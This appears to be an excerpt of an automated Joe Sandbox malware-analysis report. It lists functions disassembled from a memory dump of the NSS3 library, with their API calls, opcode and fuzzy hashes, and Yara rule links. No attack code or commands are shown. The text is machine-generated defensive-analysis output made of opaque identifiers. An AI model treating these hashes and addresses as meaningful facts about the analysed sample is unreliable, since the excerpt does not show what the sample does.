_PR_MD_NOTIFY_CV.NSS3(-00000074), ref: 6C659FCF
_PR_MD_UNLOCK.NSS3(?), ref: 6C659FF2
_PR_MD_UNLOCK.NSS3(?), ref: 6C65A01D

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: CriticalEnterSection
String ID:
API String ID: 1904992153-0
Opcode ID: 10634018fd28ff7dcca81e9e290dba8d0b098c81a53de7589e6c9c3c363a67f3
Instruction ID: 8b2fa60c4786d670ce34aad771be19fcdf6c94c69b15242ed757448438a382f3
Opcode Fuzzy Hash: 10634018fd28ff7dcca81e9e290dba8d0b098c81a53de7589e6c9c3c363a67f3
Instruction Fuzzy Hash: EF51F4B2900201CBCB10DF21D88069AB7F1FF0531CF298669D85A67B12E731F896CBD9

Function 6C54DCE0 Relevance: 12.1, APIs: 8, Instructions: 90stringCOMMON

Download Yara Rule

APIs

PR_Now.NSS3 ref: 6C54DCFA

Part of subcall function 6C609DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C650A27), ref: 6C609DC6
Part of subcall function 6C609DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C650A27), ref: 6C609DD1
Part of subcall function 6C609DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C609DED

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C54DD40
CERT_FindCertIssuer.NSS3(?,?,?,?), ref: 6C54DD62
CERT_DestroyCertificate.NSS3(?), ref: 6C54DD71
CERT_DestroyCertificate.NSS3(00000000), ref: 6C54DD81
CERT_RemoveCertListNode.NSS3(?), ref: 6C54DD8F

Part of subcall function 6C5606A0: TlsGetValue.KERNEL32 ref: 6C5606C2
Part of subcall function 6C5606A0: EnterCriticalSection.KERNEL32(?), ref: 6C5606D6
Part of subcall function 6C5606A0: PR_Unlock.NSS3 ref: 6C5606EB

CERT_DestroyCertificate.NSS3(?), ref: 6C54DD9E
CERT_DestroyCertificate.NSS3(?), ref: 6C54DDB7

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: CertificateDestroy$Time$CertSystem$CriticalEnterFileFindIssuerListNodeRemoveSectionUnlockUnothrow_t@std@@@Value__ehfuncinfo$??2@strcmp
String ID:
API String ID: 653623313-0
Opcode ID: 5cd1e4dda6c1f4cf8b67a259948b155a30ce1e8299e7f18c14593722b5766ec0
Instruction ID: 15b2a024b2c9f6b0f2a569a17da8c9ef740978534391d0c0d63fcdaf0c86a126
Opcode Fuzzy Hash: 5cd1e4dda6c1f4cf8b67a259948b155a30ce1e8299e7f18c14593722b5766ec0
Instruction Fuzzy Hash: 0B2189B6E0112A9BDF01DEA4DC419DEBBB8AF45318F188424EC18A7711E721ED14CBE2

Function 6C5D5F60 Relevance: 12.1, APIs: 8, Instructions: 64COMMON

Download Yara Rule

APIs

PR_DestroyMonitor.NSS3(?,00000000,00000000,?,6C5DAADB,?,?,?,?,?,?,?,?,00000000,?,6C5D80C1), ref: 6C5D5F72

Part of subcall function 6C53ED70: DeleteCriticalSection.KERNEL32(?), ref: 6C53ED8F
Part of subcall function 6C53ED70: DeleteCriticalSection.KERNEL32(?), ref: 6C53ED9E
Part of subcall function 6C53ED70: DeleteCriticalSection.KERNEL32(?), ref: 6C53EDA4

PR_DestroyMonitor.NSS3(?,00000000,00000000,?,6C5DAADB,?,?,?,?,?,?,?,?,00000000,?,6C5D80C1), ref: 6C5D5F8F
DeleteCriticalSection.KERNEL32(00000001,00000000,00000000,?,6C5DAADB,?,?,?,?,?,?,?,?,00000000,?,6C5D80C1), ref: 6C5D5FCC
free.MOZGLUE(?,?,6C5DAADB,?,?,?,?,?,?,?,?,00000000,?,6C5D80C1), ref: 6C5D5FD3
DeleteCriticalSection.KERNEL32(00000001,00000000,00000000,?,6C5DAADB,?,?,?,?,?,?,?,?,00000000,?,6C5D80C1), ref: 6C5D5FF4
free.MOZGLUE(?,?,6C5DAADB,?,?,?,?,?,?,?,?,00000000,?,6C5D80C1), ref: 6C5D5FFB
PR_DestroyMonitor.NSS3(?,00000000,00000000,?,6C5DAADB,?,?,?,?,?,?,?,?,00000000,?,6C5D80C1), ref: 6C5D6019
PR_DestroyMonitor.NSS3(?,00000000,00000000,?,6C5DAADB,?,?,?,?,?,?,?,?,00000000,?,6C5D80C1), ref: 6C5D6036

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: CriticalDeleteSection$DestroyMonitor$free
String ID:
API String ID: 227462623-0
Opcode ID: 52153e360d7c8922c2e9d1e2b76884a7c72c7fee4ee5544a1fa5ebc227006b44
Instruction ID: fa15460ab8c3a0d069fde78515e061e0f3f3703835376764c4e62ea9a40c685d
Opcode Fuzzy Hash: 52153e360d7c8922c2e9d1e2b76884a7c72c7fee4ee5544a1fa5ebc227006b44
Instruction Fuzzy Hash: 242138F1604B01ABEB119F75AC48BD377E8AB45708F10082CE46ECB640EB76F419CB96

Function 6C650860 Relevance: 12.1, APIs: 8, Instructions: 61COMMON

Download Yara Rule

APIs

PR_LogFlush.NSS3(00000000,00000000,?,?,6C657AE2,?,?,?,?,?,?,6C65798A), ref: 6C65086C

Part of subcall function 6C650930: EnterCriticalSection.KERNEL32(?,00000000,?,6C650C83), ref: 6C65094F
Part of subcall function 6C650930: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?,?,6C650C83), ref: 6C650974
Part of subcall function 6C650930: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C650983
Part of subcall function 6C650930: _PR_MD_UNLOCK.NSS3(?,?,6C650C83), ref: 6C65099F

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000001,00000000,00000000,?,?,6C657AE2,?,?,?,?,?,?,6C65798A), ref: 6C65087D
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,6C657AE2,?,?,?,?,?,?,6C65798A), ref: 6C650892
fclose.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,?,6C65798A), ref: 6C6508AA
free.MOZGLUE(?,00000000,00000000,?,?,6C657AE2,?,?,?,?,?,?,6C65798A), ref: 6C6508C7
free.MOZGLUE(?,00000000,00000000,?,?,6C657AE2,?,?,?,?,?,?,6C65798A), ref: 6C6508E9
free.MOZGLUE(?,6C657AE2,?,?,?,?,?,?,6C65798A), ref: 6C6508EF
PR_DestroyLock.NSS3(?,00000000,00000000,?,?,6C657AE2,?,?,?,?,?,?,6C65798A), ref: 6C65090E

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: free$__acrt_iob_func$CriticalDestroyEnterFlushLockSectionfclosefflushfwrite
String ID:
API String ID: 3145526462-0
Opcode ID: 05d913bc63b2e1378befd358740d9e3bfd57e5b468576953e691f3c3878bd3f8
Instruction ID: df2d3ad0e3026e1c83e01e3b41cc889efae28a826f58a77350256b97523b2e2c
Opcode Fuzzy Hash: 05d913bc63b2e1378befd358740d9e3bfd57e5b468576953e691f3c3878bd3f8
Instruction Fuzzy Hash: 951193B5B012519BEF009F96E8C5B4A7778AB4235CF6C1124E40697650DA31F825CBDE

Function 6C543C90 Relevance: 12.1, APIs: 8, Instructions: 60COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?,?,?,6C5B460B,?,?), ref: 6C543CA9
EnterCriticalSection.KERNEL32(?), ref: 6C543CB9
PL_HashTableLookup.NSS3(?), ref: 6C543CC9
SECITEM_DupItem_Util.NSS3(00000000), ref: 6C543CD6
PR_Unlock.NSS3 ref: 6C543CE6
CERT_FindCertByDERCert.NSS3(?,00000000), ref: 6C543CF6
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C543D03
PR_Unlock.NSS3 ref: 6C543D15

Part of subcall function 6C5EDD70: TlsGetValue.KERNEL32 ref: 6C5EDD8C
Part of subcall function 6C5EDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C5EDDB4

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: CertCriticalItem_SectionUnlockUtilValue$EnterFindHashLeaveLookupTableZfree
String ID:
API String ID: 1376842649-0
Opcode ID: 74178ce2c172e9333d1594e467db21d45c5ae021da8ac5f60f32f56e741b7be1
Instruction ID: d1e62a36b28761a0bd02487d94a34e787b5d56e5feeff60d2a2a02027173ca80
Opcode Fuzzy Hash: 74178ce2c172e9333d1594e467db21d45c5ae021da8ac5f60f32f56e741b7be1
Instruction Fuzzy Hash: 36112976E40505E7EB012B26EC458AB3B38EF8239CF148130EC1C83721FB22EC5886D5

Function 6C65B850 Relevance: 12.0, APIs: 8, Instructions: 47COMMON

Download Yara Rule

APIs

DeleteCriticalSection.KERNEL32(?,00000000,?,6C657AF9,?,?,?,?,?,?,?,?,6C65798A), ref: 6C65B862
free.MOZGLUE(?,?,6C657AF9,?,?,?,?,?,?,?,?,6C65798A), ref: 6C65B869
DeleteCriticalSection.KERNEL32(?,00000000,?,6C657AF9,?,?,?,?,?,?,?,?,6C65798A), ref: 6C65B88A
free.MOZGLUE(?,?,6C657AF9,?,?,?,?,?,?,?,?,6C65798A), ref: 6C65B891
DeleteCriticalSection.KERNEL32(6C65798A), ref: 6C65B8B9
free.MOZGLUE(?), ref: 6C65B8C0
DeleteCriticalSection.KERNEL32(?,00000000,?,6C657AF9,?,?,?,?,?,?,?,?,6C65798A), ref: 6C65B8E1
free.MOZGLUE(?,?,6C657AF9,?,?,?,?,?,?,?,?,6C65798A), ref: 6C65B8E8

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: CriticalDeleteSectionfree
String ID:
API String ID: 2988086103-0
Opcode ID: 61a5622f28d0ae15915332e9253a0e968d21966d5e3cb890852d277c90e5a226
Instruction ID: 12d4c3b81591853562eb26cf9da4dc1dc0ca7c5d7b898060dc2ace3bcf780f16
Opcode Fuzzy Hash: 61a5622f28d0ae15915332e9253a0e968d21966d5e3cb890852d277c90e5a226
Instruction Fuzzy Hash: 6C1170B1A02A11ABCF10DFA3E48CB4B77B8BB0A714F404114E41B57A00C335B515CBDD

Function 6C549C50 Relevance: 10.8, APIs: 7, Instructions: 253stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6C5611C0: PR_NewLock.NSS3 ref: 6C561216

free.MOZGLUE(?), ref: 6C549E17
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C549E25
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C549E4E
TlsGetValue.KERNEL32 ref: 6C549EA2

Part of subcall function 6C559500: memcpy.VCRUNTIME140(00000000,?,00000000,?,?), ref: 6C559546

EnterCriticalSection.KERNEL32(?), ref: 6C549EB6
PR_Unlock.NSS3 ref: 6C549ED9
PR_SetError.NSS3(FFFFE08A,00000000), ref: 6C549F18

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: strlen$CriticalEnterErrorLockSectionUnlockValuefreememcpy
String ID:
API String ID: 3381623595-0
Opcode ID: 0bf4b3b18555ed7b3157f0bf48bcea6e8af9406360c54bc5d362c8b007c4b116
Instruction ID: dc1823e7afa9ccc351aaa652ec38cbb94650a12bad546a850e64942b110b9f29
Opcode Fuzzy Hash: 0bf4b3b18555ed7b3157f0bf48bcea6e8af9406360c54bc5d362c8b007c4b116
Instruction Fuzzy Hash: 6781F8B1A00201EBEB11DF35DD42AABB7A9BF85348F548529EC4987B11FB31ED24C791

Function 6C55DCB0 Relevance: 10.7, APIs: 7, Instructions: 245stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6C55AB10: DeleteCriticalSection.KERNEL32(D958E852,6C561397,5B5F5EC0,?,?,6C55B1EE,2404110F,?,?), ref: 6C55AB3C
Part of subcall function 6C55AB10: free.MOZGLUE(D958E836,?,6C55B1EE,2404110F,?,?), ref: 6C55AB49
Part of subcall function 6C55AB10: DeleteCriticalSection.KERNEL32(5D5E6C75), ref: 6C55AB5C
Part of subcall function 6C55AB10: free.MOZGLUE(5D5E6C69), ref: 6C55AB63
Part of subcall function 6C55AB10: DeleteCriticalSection.KERNEL32(0148B821,?,2404110F,?,?), ref: 6C55AB6F
Part of subcall function 6C55AB10: free.MOZGLUE(0148B805,?,2404110F,?,?), ref: 6C55AB76

TlsGetValue.KERNEL32 ref: 6C55DCFA
EnterCriticalSection.KERNEL32(00000000), ref: 6C55DD0E
PK11_IsFriendly.NSS3(?), ref: 6C55DD73
PK11_IsLoggedIn.NSS3(?,00000000), ref: 6C55DD8B
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C55DE81
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C55DEA6
PR_Unlock.NSS3(?), ref: 6C55DF08

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: CriticalSection$Deletefree$K11_$EnterFriendlyLoggedUnlockValuememcpystrlen
String ID:
API String ID: 519503562-0
Opcode ID: d8a5e545e5ad04e85cb45061c4d3b646bef1feefb7fc432d025b49be70e2f635
Instruction ID: 382490e67478eec81a6911ad46927a1a8c699dc28e198979cdf3df671bc288ea
Opcode Fuzzy Hash: d8a5e545e5ad04e85cb45061c4d3b646bef1feefb7fc432d025b49be70e2f635
Instruction Fuzzy Hash: 0591C4B6A00105DFEB00CF68CD81BAAB7B5EF94308F94402ADC199B751E731ED65CB92

Function 6C515FC0 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 230COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,000293F4,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,6C5FBB62,00000004,6C664CA4,?,?,00000000,?,?,6C4D31DB), ref: 6C5160AB
sqlite3_config.NSS3(00000004,6C664CA4,6C5FBB62,00000004,6C664CA4,?,?,00000000,?,?,6C4D31DB), ref: 6C5160EB
sqlite3_config.NSS3(00000012,6C664CC4,?,?,6C5FBB62,00000004,6C664CA4,?,?,00000000,?,?,6C4D31DB), ref: 6C516122

Strings

%s at line %d of [%.10s], xrefs: 6C5160A4
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C516095
misuse, xrefs: 6C51609F

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: sqlite3_config$sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$misuse
API String ID: 1634735548-648709467
Opcode ID: e4739e597e26e4095a25b624df221a8bde02986142a9d47f75f4f6d71d96a541
Instruction ID: 98aaaef096ff2c2a476e3bd1debd3925aab8418a701b1deeb3eb668b9b921667
Opcode Fuzzy Hash: e4739e597e26e4095a25b624df221a8bde02986142a9d47f75f4f6d71d96a541
Instruction Fuzzy Hash: 53B19370E08747CFDB04CF19C6849A9B7F0FB1E304F018559D549AB722EB30AA94CB9A

Function 6C4C4F60 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 211stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C4C4FC4
sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,0002996C,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C4C51BB

Strings

%s at line %d of [%.10s], xrefs: 6C4C51B4
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C4C51A5
unable to delete/modify user-function due to active statements, xrefs: 6C4C51DF
misuse, xrefs: 6C4C51AF

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: sqlite3_logstrlen
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$misuse$unable to delete/modify user-function due to active statements
API String ID: 3619038524-4115156624
Opcode ID: 6988e874e53bb3d7619cc81f62218ff88428d45442c4fc145476d7f38361a6fb
Instruction ID: cf80e49f54f0c99cca15442c8162a53c7ba2138840797d649c0cffd6abc27585
Opcode Fuzzy Hash: 6988e874e53bb3d7619cc81f62218ff88428d45442c4fc145476d7f38361a6fb
Instruction Fuzzy Hash: 9A71AC79B042099BEB00CE16CD80FAE77B5BB48349F044528ED19DBBA1D731E851DBA2

Function 6C5AFF10 Relevance: 10.7, APIs: 7, Instructions: 164memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000400,?,?,00000000,00000000,?,6C5AF165,?), ref: 6C5AFF4B
PORT_ArenaAlloc_Util.NSS3(00000000,-000000F8,?,?,?,00000000,00000000,?,6C5AF165,?), ref: 6C5AFF6F
memset.VCRUNTIME140(00000000,00000000,-000000F8,?,?,?,?,?,00000000,00000000,?,6C5AF165,?), ref: 6C5AFF81
PORT_ArenaAlloc_Util.NSS3(00000000,-000000F8,?,?,?,?,?,00000000,00000000,?,6C5AF165,?), ref: 6C5AFF8D
memset.VCRUNTIME140(00000000,00000000,-000000F8,?,?,?,?,?,?,?,00000000,00000000,?,6C5AF165,?), ref: 6C5AFFA3
SEC_ASN1EncodeItem_Util.NSS3(00000000,00000000,6C5AF165,6C67219C,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C5AFFC8
PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,00000000,00000000,?,6C5AF165,?), ref: 6C5B00A6

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: Util$Alloc_ArenaArena_memset$EncodeFreeItem_
String ID:
API String ID: 204871323-0
Opcode ID: b86e71f4db81951af9af93b625e7bc8ede0f0fe032ed3507939153855e8bad86
Instruction ID: bdf0c37b2480f18cf4fbe063a5d99b4784b636e9a938d5e40e87f96e0a7863be
Opcode Fuzzy Hash: b86e71f4db81951af9af93b625e7bc8ede0f0fe032ed3507939153855e8bad86
Instruction Fuzzy Hash: 5851E8B1E0425A9FDB108E99CDD07AEBBB5BB89318FA5022ADD55B7740D331AC11CBD0

Function 6C56DEF0 Relevance: 10.7, APIs: 7, Instructions: 159COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C56DF37
EnterCriticalSection.KERNEL32(?), ref: 6C56DF4B
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C56DF96
PR_SetError.NSS3(00000000,00000000), ref: 6C56E02B
PR_Unlock.NSS3(?), ref: 6C56E07E
PR_SetError.NSS3(FFFFE001,00000000), ref: 6C56E090
PR_Unlock.NSS3(?), ref: 6C56E0AF

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: Error$Unlock$CriticalEnterSectionValue
String ID:
API String ID: 4073542275-0
Opcode ID: afc49bd7a5f69c87994fbc0d35cddf4b229cf603794f3e71f7b1c154abc34655
Instruction ID: da32aa07aa76fecf840818cbdf789e556292c4f96df6391e762387e504910ba0
Opcode Fuzzy Hash: afc49bd7a5f69c87994fbc0d35cddf4b229cf603794f3e71f7b1c154abc34655
Instruction Fuzzy Hash: E4519031901600DFDB20DF66DC44B56B3B5BF45328F204929E89687FA1D775E848CB92

Function 6C58AC10 Relevance: 10.6, APIs: 7, Instructions: 121memoryCOMMON

Download Yara Rule

APIs

PK11_CreateContextBySymKey.NSS3(00000133,00000105,00000000,?,?,6C58AB3E,?,?,?), ref: 6C58AC35

